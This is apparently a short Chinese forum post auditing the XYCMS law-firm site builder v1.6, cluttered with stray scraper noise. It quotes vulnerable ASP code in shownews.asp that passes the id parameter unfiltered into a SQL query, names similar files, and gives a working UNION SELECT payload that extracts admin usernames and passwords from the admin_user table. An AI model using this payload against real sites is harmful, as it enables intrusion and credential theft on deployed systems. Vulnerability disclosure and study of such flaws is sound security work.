前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似7 i& m, K. X$ f6 S9 U' o4 h1 ` M3 W
" t7 D4 S' ~& H
淫荡分割线7 Y8 G. I; T% F6 ?- l9 i# v! D: Q
--------------------------------------------------------' B2 G' ~% o* c8 P, f, A- n
# k. M6 z9 e- s+ V; ^审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)( D4 H/ g8 O' f, q+ B
源码地址:http://down.chinaz.com/soft/29233.htm: r( D* j; z% }# O& V; ~' N, x
' e" y2 y* z( I$ k5 e漏洞文件:shownews.asp c* B+ v; ~1 \9 D- S' g
漏洞代码:7-13行# E- n0 Z; ?. t$ |. r
' s6 A7 R( l; ` ( c4 F" b! i5 T3 U9 P
<% & p6 D1 U+ |3 V3 Q# L) ]$ c# D+ Y
id=request.QueryString("id")* m- {6 i& J0 U3 G; P
# o- K* k5 @; y5 I. S
set snews=server.createobject("adodb.recordset")
: m/ |8 s" g+ `+ w2 Zexec="select * from [news] where id="&id
7 M! _ x# z: xsnews.open exec,conn,1,1
$ ?) b; r [# ?/ }( w%>* q3 Z, z2 o! f8 e6 v; j% l w8 h- U
+ Y% Q% y3 d* w' }4 C # `$ [% j4 a, [! S
什么过滤都没有 直造成注入
4 x5 M3 K: D( o 8 I! a, {1 v$ d( K
注入点:http://127.0.0.1:99/shownews.asp?id=xx
K1 {0 b5 c+ [ X
, t- u/ n# U- ^, M% D1 \. L( i其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
7 p6 E( w8 U# u. a, T& e* ^ 9 g3 G7 i$ e( G4 e: [
% r4 L$ i- ]- pexp: union select 1,admin,password,4,5,7 from admin_user! f/ ]: b# `1 Y1 V7 g5 T; x
/ m/ N# t# ?% S8 B0 ~* Z2 ? |